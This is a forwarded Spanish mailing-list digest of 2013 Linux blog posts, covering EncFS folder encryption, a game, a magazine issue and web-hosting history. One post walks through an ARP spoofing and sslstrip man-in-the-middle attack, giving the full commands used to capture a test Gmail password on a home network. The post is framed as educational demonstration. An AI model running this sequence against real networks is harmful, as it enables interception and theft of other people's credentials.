Protege tus datos con EncFS Posted: 29 Jul 2013 06:31 AM PDT
folder_protect Hace un tiempo atrás les mostré como proteger nuestras carpetas y su contenido usando Cryptkeeper, una aplicación que podemos encontrar en los repositorios de nuestras distribuciones favoritas. En el caso de Arch Linux, Cryptkeeper se encuentra en AUR, y aunque puedo instalarlo no tenía ganas de añadir Yaourt o usar makepkg. Así que pensé: Cryptkeeper debe ser un front-end de otra aplicación. Y en efecto, Cryptkeeper es un front mejorado para EncFS (como bien comentó en su momento el usuario mxs). ¿Por qué mejorado? Pues porque Cryptkeeper nos muestra/oculta la carpeta donde guardamos nuestro contenido, cosa que EncFS no hace. Pero podemos lograrlo de forma muy sencilla. Usando EncFS Para este ejemplo estoy suponiendo que ya tenemos una carpeta encriptada. Normalmente tendrá un punto delante del nombre, por ejemplo .Privado. Ahora bien, digamos que quiero acceder a la carpeta .Privado. Lo primero es instalar EncFS. $ sudo pacman -S encfs Si queremos montar la carpeta encriptada con nuestro usuario (y no usando sudo), tenemos que instalar el paquete fuse y en el caso de Debian, añadir nuestro usuario a ese grupo: $ sudo pacman -S fuse Curiosamente con Arch Linux no tuve que añadir mi usuario al grupo fuse, de hecho, no existe tal grupo. o_O Ahora bien, para mostrar la carpeta .Privado, tenemos que crear una carpeta vacía para “montar” .Privado en ella. Digamos que tenemos la carpeta Privado (sin el punto delante). Entonces ejecutamos: $ encfs /home/usuario/.Privado/ /home/usuario/Privado/ Luego, para desmontarla, solo tenemos que poner: $ fusermount -u /home/usuario/Privado/ Y eso es todo. Pero como nosotros somos usuarios inteligentes, pues crearemos 2 alias en el fichero .bashrc que nos creará la carpeta, ejecutará encfs y posteriormente Dolphin, Nautilus o nuestro gestor de ficheros preferido. alias activar='mkdir /home/usuario/Privado && encfs /home/usuario/.Privado / home/usuario/Privado && dolphin' y para desmontarla: alias desactivar='fusermount -u /home/usuario/Privado/ && rm -R /home/usuario/ Privado' Como ven yo usé los alias activar y desactivar pero ustedes usan el que quieran.. [UsemosLinu] [UsemosLinu] [UsemosLinu] [UsemosLinu] [UsemosLinu] * TuxPuck: Clon de Shufflepuck Cafe Posted: 29 Jul 2013 06:17 AM PDT En realidad no sé como se llama este juego en la vida real (yo solo lo he jugado y punto). Es como Jockey, pero sobre una mesa que impulsa aire para que la ficha se mueva a velocidades de vértigo.. Si, me imagino que ya saben cual es. Pues bien, en los repositorios de Arch se encuentra un juego como ese llamado TuxPuck, donde tenemos como oponentes a Tux y Arcana. Los invito a instalarlo y echarle ganas.. ya me dirá quién pudo ganarle a estos dos individuos. Yo me rendí, hay que tener los reflejos de piloto de un Caza de Combate. tuxpuck El juego no tiene opciones avanzadas ni nada por el estilo. Solo nos movemos con el cursor para evitar que la ficha llegue a nuestra ¿portería?. Para instalarlo ya saben: $ sudo pacman -S tuxpuck Y en el caso de Debian: $ sudo aptitude install tuxpuck [UsemosLinu] [UsemosLinu] [UsemosLinu] [UsemosLinu] [UsemosLinu] * La Novena de HDMagazine Posted: 29 Jul 2013 06:00 AM PDT hdmagazine Perseo aparece como autor en uno de los artículos. Eso es suficiente razón como para descargarla. 1. Recupera la contraseña de Root en GNU/Linux 2. Conexiones SSH y SFTP desde Python con paramiko 3. Piwik: Una plataforma de análisis web alternativa 4. Página man ¿Como crearlas? 5. Monitorización del Sistema con Conky 6. Creando capturas de pantalla para tus manuales con Shutter 7. Trabajando con GIT II 8. KILL & KILLALL: Asesinato en primer grado 9.El Poderoso Vitrualenvwrapper 10. ASCII Art HDMagazine n° 9 [UsemosLinu] [UsemosLinu] [UsemosLinu] [UsemosLinu] [UsemosLinu] * ArpSpoofing y SSlstrip en Acción. Posted: 29 Jul 2013 05:37 AM PDT Hola Bloggeros. Para hoy les tengo una pequeña muestra de lo peligroso que puede ser estar conectados en cualquier red sin seguridad de esas que tantos nos gustan. Para el día de hoy, voy a usar ArpSpoofing con Sslstrip para conseguir una contraseña de Gmail. Para hacer el ambiente mas controlado, he creado una cuenta llamada “prueba...@gmail.com”. Y como no me gustan mucho los preámbulos vamos a ponernos a jugar. No me hago responsable en ningún momento de lo que puedan hacer con la siguiente información. Lo hago exclusivamente con fines educativos ENTORNO Para esta prueba lo que tenemos es lo siguiente: 1. Atacante: Es mi ordenador de mesa o Desktop que tiene Debian Wheezy. Desde repositorios se puede instalar sslstrip y dsniff para conseguir tener arpspoofing 2. Victima: La víctima es una Tablet con Android que solamente quiere ver su correo por medio del navegador. 3. El medio: El medio es mi Router Cisco DPC2425 DIRECCIONES. Direccion del atacante: 172.26.0.2 Direccion del Router: 172.26.0.1 Direccion de la Victima: 172.26.0.8 EL ATAQUE: Para entener un poco más el funcionamiento del ataque puedes dirigirte a mi antiguo POST Lo primero que haremos para este ataque será activar el forward para que nuestro ordenador pueda reenviar la información a la víctima sin que se de cuenta. (De lo contrario seria un ataque de denegación de servicios) Para eso usaremos: echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080 arpspoof -i eth0 -t 172.26.0.8 172.26.0.1 arpspoof -i eth0 -t 172.26.0.1 172.26.0.2 sslstrip -a -w desdelinux -l 8080 Cada comando en una ventana de consola diretente. Ahora si hacemos tail -f desdelinux vemos la informacion en vivo y en directo instantánea1 Entonces luego como conseguimos lo que queremos? Vamos primero a ingresar a nuestro correo en la Tablet. Mientras abre sesión vemos que en nuestra consola salen miles y miles de cosas. Ahora que ha terminado vamos a abrir nuestro archivo “desdelinux” con nano [code] nano desdelinux[/code] con Control + W bucamos algo que se llama SECURE POST. Y vamos a ver algo como esto. instantánea2 Entre esa linea enorme que no se alcanza a terminar de ver está el correo y la contraseña de la víctima. Entonces corremos hacia la derecha hasta que por fin vemos la luz al final del túnel. instantánea3 En otra ocasión veremos como nos podemos proteger un poco de estos ataques. Saludos [UsemosLinu] [UsemosLinu] [UsemosLinu] [UsemosLinu] [UsemosLinu] * La historia y pesares de DesdeLinux con Hostings y VPS Posted: 29 Jul 2013 04:17 AM PDT En este mundo nada o casi nada es gratis, tener un sitio web cuesta dinero, pues se debe comprar (y mantener) el dominio, así como también se necesita un hosting o servidor donde esté ubicado el sitio o sitios. Cuando un sitio necesita y depende de una base de datos tipo MySQL para su funcionamiento, cuando el sitio no está del todo bien optimizado, pero sobre todo… cuando el sitio es relativamente popular (o al menos recibe gran cantidad de visitas) se puede convertir en un problema para los proveedores de hosting, pues el sitio puede llegar a consumir demasiados recursos. En el artículo anterior donde mencionaba que estábamos probando un VPS de GnuTransfer varios usuarios (Bruno y José Torres) me pidieron que compartiera las experiencias que hemos tenido con proveedores de VPS (y Hosting asumo también), por lo que … acá estoy para eso, para explicar por partes cómo se ha mantenido online hasta el momento DesdeLinux :D Expliquemos por partes cómo hemos llegado hasta aquí ;) 1. Hosting en SlickWebHost: Cuando empezamos con DesdeLinux hace poco más de dos años esto era solo una idea, un simple sitio (blog) donde elav y yo pensábamos compartir nuestras experiencias y conocimientos. En ese momento pudimos comprar el dominio y también solo un mes de hosting en SlickWebHost.com El hosting con ellos no recuerdo muy bien como fue en calidad, pero sí recuerdo que en esa época lo consideré bastante caro, pues era un reseller nada barato. No estuvimos ahí mucho tiempo, menos de un mes. 2. Hosting en A2Hosting: Buscando un mejor hosting que el anterior, hablé por LiveChat con varios proveedores de hostings que tuvieran precios relativamente baratos en ese momento, uno en particular me llamó la atención porque muchos lo catalogaban como “una empresa de geeks”, esta era A2Hosting.com . Tuve algunas charlas con ellos mediante LiveChat y me convencieron, brindaban un hosting aparentemente bueno y además facilidades como CPanel y Softaculus En noviembre de 2011 (apenas 4 meses de comprar el hosting con ellos) ya presentábamos grandes problemas, teníamos caídas de forma simultánea. No faltó mucho para que desde A2Hosting nos mandaran un email diciéndonos que nosotros (el blog) estábamos consumiendo demasiados recursos, que teníamos que pasarnos a un plan superior (lo que incluye pagar más dinero), esto obviamente no nos gustó ni un poco por lo que gracias a las donaciones de varios amigos, pudimos comprar un Hosting con Hostgator. 3(a). VPS con AlvoTech: Con las donaciones que recibimos también pudimos comprar un VPS con Alvotech.de , una empresa alemana que se dedica a vender VPS (servidores virtuales). Intentamos en un inicio poner el blog ahí, pero desafortunadamente no era posible, en ese momento el blog consumía demasiados recursos por estar muy pobremente optimizado, el VPS no podía soportar ni remotamente la carga que el blog generaría. En vez de eso, decidimos poner en ese VPS otros servicios como Foro, Paste, IRC, FTP, nuestro MailServer, y alguna que otra cosa. Aunque el VPS presenta de vez en cuando algún que otro problema, es algo raro pues por lo general es realmente estable el servicio de Alvotech, no obstante con reiniciar el VPS se soluciona. By the way … el VPS funciona con Debian y está ubicado en Düsseldorf, Alemania ;) 3(b). Hosting en Hostgator: Una vez ya ubicado el blog en Hostgator todo fue a mejor en un inicio. Comparado con los proveedores anteriores Hostgator era sin lugar a dudas superior en ese momento, el sitio funcionaba más fluido, no presentaba errores, no era un secreto que en ese momento (inclusive ahora) Hostgator es uno de los mejores proveedores de hosting. El problema vino con el tiempo, mientras más visitas teníamos, mientras más lectores teníamos, mientras más populares nos volvíamos más problemas presentábamos en Hostgator. Era una vez más, el mismo problema de siempre, recibíamos demasiadas visitas, generábamos demasiado procesamiento, sobrecargábamos demasiado al servidor donde estaba nuestra cuenta de Hosting, por lo que … de nuevo volvían los molestos errores: “Error 500 Internal Server“. 4. VPS con GnuTransfer: Los chicos de GnuTransfer (Javier específicamente) tuvieron la gentileza y cortesía de enviarme un cupón para probar durante un mes un VPS de forma totalmente gratis, y aunque aún estamos en ese período de prueba… ya nos tienen convencidos de comprar con ellos (motivos múltiples, lo comentaré en otro post). A día de hoy el blog está ubicado en un VPS de GnuTransfer, hasta el momento no presentamos problemas, el sitio funciona tan rápido como nunca antes … sin errores, sin fallos, una maravilla. Ya hablaré en otro artículo específicamente sobre GnuTransfer y sus servicios pues hay mucho de qué hablar y explicar por el momento solo diré que el VPS funciona con Debian (Wheezy), usando Nginx+MySQL+PHP5+APC, realmente optimizado todo, al punto de que con aproximadamente 60 usuarios online el consumo de RAM no sobrepasa los 390MB … en realidad, asombroso :D En este minuto tenemos el plan xen-02048 y nos funciona de maravillas, pero … bueno, en otro post les contaré las novedades, pues no nos pensamos quedar con este plan solamente ;) [UsemosLinu] [UsemosLinu] [UsemosLinu] [UsemosLinu] [UsemosLinu] * You are subscribed to email updates from <° Linux Email delivery powered by To stop receiving these emails, you may Google unsubscribe now. Google Inc., 20 West Kinzie, Chicago IL USA 60610 ----- End forwarded message ----- -- -------- Warning! ------------ 100'000 pelos de escoba fueron introducidos satisfactoriamente en su puerto USB. -- Este mensaje ha sido analizado por MailScanner en busca de virus y otros contenidos peligrosos, y se considera que est� limpio.
______________________________________________________________________ Lista de correos del Grupo de Usuarios de Tecnologías Libres de Cuba. Gutl-l@jovenclub.cu https://listas.jovenclub.cu/cgi-bin/mailman/listinfo/gutl-l